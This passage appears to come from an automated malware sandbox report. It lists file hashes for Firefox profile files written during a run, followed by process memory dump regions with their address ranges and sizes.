                                                                6cc2588151a2bfc8aafa92a101889d601118b0ac0c665b159529eb9011730f3185fee209b6e83bf33723f4977a32059b759a93e8d4702d032e3c73ae7e07d140

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\datareporting\glean\pending_pings\efda2935-b90c-4410-a23f-af9b5d1620df

                                                                Filesize

                                                                656B

                                                                MD5

                                                                7e4654d60ffe0886b8ab65da3def9bf8

                                                                SHA1

                                                                244e06776b2749e14e6ebfd188c022d4865944b7

                                                                SHA256

                                                                dd4bc65eeac2cca5de7cddac985a8e13e8b2ecb4192de44f14626ad34e9103d8

                                                                SHA512

                                                                de4b71c66f73a141aa8992756182a6a01c67c6ccc90a2321d1591147f237cd2437daf97067d444f7a3821d8c5e41401ac18ed5ee94bc9aadbbc1db0824deb457

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs-1.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                bc71da6f85a2cf87a4f9a32fc5854d66

                                                                SHA1

                                                                dd418dfa3e6dae6f984a2385c83e5d087ecce5c9

                                                                SHA256

                                                                423512de050cbadb458c6520301f70077e84144ac8e313f752cf35ac915f7861

                                                                SHA512

                                                                1b69d61e52f7e302c207da7680e647fc205f82fe10a7d21c4cd8a627df0b7b9a7be7d5ed2dec17c5a0c9909eca07eccded206b892346dc820f26b5294f5e4b83

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                a8ed61d79d16d1db1c6c4adc6ec96502

                                                                SHA1

                                                                2af6753d49e8ae7ee85cf475780b058f11d36dd7

                                                                SHA256

                                                                094f2b7301b3940eba52ff518379b2fb831f77f4a76b0ff17c36cbbd17650afd

                                                                SHA512

                                                                2ea73d454a74335191d2c557b01b612a1cfbbb828550610083d9558fd857b5aaad1c6c437777ba5f6f64f393baa473ec149f7c2956446c4f66b61c986af515b1

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionCheckpoints.json.tmp

                                                                Filesize

                                                                53B

                                                                MD5

                                                                ea8b62857dfdbd3d0be7d7e4a954ec9a

                                                                SHA1

                                                                b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

                                                                SHA256

                                                                792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

                                                                SHA512

                                                                076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionCheckpoints.json.tmp

                                                                Filesize

                                                                90B

                                                                MD5

                                                                c4ab2ee59ca41b6d6a6ea911f35bdc00

                                                                SHA1

                                                                5942cd6505fc8a9daba403b082067e1cdefdfbc4

                                                                SHA256

                                                                00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

                                                                SHA512

                                                                71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionstore-backups\recovery.jsonlz4

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                7cbdac54a6d985e0265838b9a1cf4e53

                                                                SHA1

                                                                549426a99f5e74ea487efca74781912bc502700d

                                                                SHA256

                                                                caaa136bae2ae98c5294c6916de1947886e587986403c7713120defd091a2bc4

                                                                SHA512

                                                                12dc9c567ad37218cf6fc62c1169c0b76ebdf888f2ba0cfc3458022ea2d3e2b4d45b2dfd78b27f37d87f85053dbe4140070b8730430d1df90801432fb879ddff

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\sessionstore-backups\recovery.jsonlz4

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                51e275f11f712d184330db74b4be71d9

                                                                SHA1

                                                                f3477bfdc575cdf81beef108e5546df818e4c39a

                                                                SHA256

                                                                feda4fd1f0af03469e21d8c6d545892e9366dac4fea0c5ae8c30b2d209bc897d

                                                                SHA512

                                                                aba25f5412e6a78c489f9fbf8275ba14594a34e696c10527f1108492b738439d8df28f81b7f617425e92464e8c14e3dba487ac514def164306e57b7a75cc1001

                                                              • memory/700-1079-0x0000000000880000-0x00000000008DC000-memory.dmp

                                                                Filesize

                                                                368KB

                                                              • memory/880-155-0x0000000000E00000-0x0000000000E4C000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/936-1659-0x0000000000A10000-0x0000000000E88000-memory.dmp

                                                                Filesize

                                                                4.5MB

                                                              • memory/936-1658-0x0000000000A10000-0x0000000000E88000-memory.dmp

                                                                Filesize

                                                                4.5MB

                                                              • memory/1248-45-0x0000000000CA0000-0x0000000000D4C000-memory.dmp

                                                                Filesize

                                                                688KB

                                                              • memory/1532-390-0x0000000000D00000-0x000000000139B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/1532-140-0x0000000000D00000-0x000000000139B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/1532-337-0x0000000000D00000-0x000000000139B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/1532-347-0x0000000000D00000-0x000000000139B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/1732-816-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/1732-670-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/1940-590-0x00000000013A0000-0x00000000013FC000-memory.dmp

                                                                Filesize

                                                                368KB

                                                              • memory/1952-606-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/1952-594-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/1952-596-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/1952-600-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/1952-602-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/1952-598-0x0000000000400000-0x000000000045F000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/2024-366-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-1277-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-26-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-25-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-27-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-28-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-29-0x0000000000161000-0x00000000001C9000-memory.dmp

                                                                Filesize

                                                                416KB

                                                              • memory/2024-30-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-491-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-492-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-22-0x0000000000161000-0x00000000001C9000-memory.dmp

                                                                Filesize

                                                                416KB

                                                              • memory/2024-21-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-749-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-748-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-367-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-752-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-751-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-66-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-124-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-474-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-473-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-139-0x0000000006860000-0x0000000006EFB000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/2024-1007-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-285-0x0000000006860000-0x0000000006EFB000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                              • memory/2024-1009-0x0000000006860000-0x0000000006C9C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2024-275-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-1044-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-1046-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-1389-0x0000000006860000-0x0000000006CF0000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-23-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-444-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2024-1161-0x0000000006860000-0x0000000006CF0000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2024-1349-0x0000000006860000-0x0000000006CF6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2032-170-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-166-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-412-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-589-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-463-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-481-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-557-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-553-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-533-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-173-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-172-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2032-356-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-327-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-307-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-286-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-168-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-164-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-162-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-175-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-158-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2032-160-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                Filesize

                                                                136KB

                                                              • memory/2132-1010-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2132-2228-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2132-753-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2292-265-0x0000000000DD0000-0x0000000000DE0000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/2312-115-0x00000000004A0000-0x00000000004FF000-memory.dmp

                                                                Filesize

                                                                380KB

                                                              • memory/2312-665-0x0000000000E10000-0x00000000012A6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2312-493-0x0000000000E10000-0x00000000012A6000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2392-17-0x00000000000C1000-0x0000000000129000-memory.dmp

                                                                Filesize

                                                                416KB

                                                              • memory/2392-1-0x0000000077430000-0x0000000077432000-memory.dmp

                                                                Filesize

                                                                8KB

                                                              • memory/2392-0-0x00000000000C0000-0x0000000000573000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2392-18-0x00000000000C0000-0x0000000000573000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2392-4-0x00000000000C0000-0x0000000000573000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2392-2-0x00000000000C1000-0x0000000000129000-memory.dmp

                                                                Filesize

                                                                416KB

                                                              • memory/2392-3-0x00000000000C0000-0x0000000000573000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2392-20-0x0000000007040000-0x00000000074F3000-memory.dmp

                                                                Filesize

                                                                4.7MB

                                                              • memory/2440-1045-0x0000000001090000-0x0000000001526000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2440-1249-0x0000000001090000-0x0000000001526000-memory.dmp

                                                                Filesize

                                                                4.6MB

                                                              • memory/2488-1377-0x00000000009E0000-0x0000000000E4C000-memory.dmp

                                                                Filesize

                                                                4.4MB

                                                              • memory/2488-1378-0x00000000009E0000-0x0000000000E4C000-memory.dmp

                                                                Filesize

                                                                4.4MB

                                                              • memory/2516-483-0x00000000009C0000-0x00000000009D0000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/2540-2247-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2540-1366-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2540-1074-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2648-971-0x0000000000BB0000-0x0000000000BFC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/2676-1262-0x0000000000F20000-0x0000000000FCC000-memory.dmp

                                                                Filesize

                                                                688KB

                                                              • memory/2840-475-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2840-368-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2840-845-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2840-534-0x0000000000400000-0x000000000083C000-memory.dmp

                                                                Filesize

                                                                4.2MB

                                                              • memory/2884-61-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-59-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2884-56-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-54-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-52-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-50-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2884-48-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                Filesize

                                                                372KB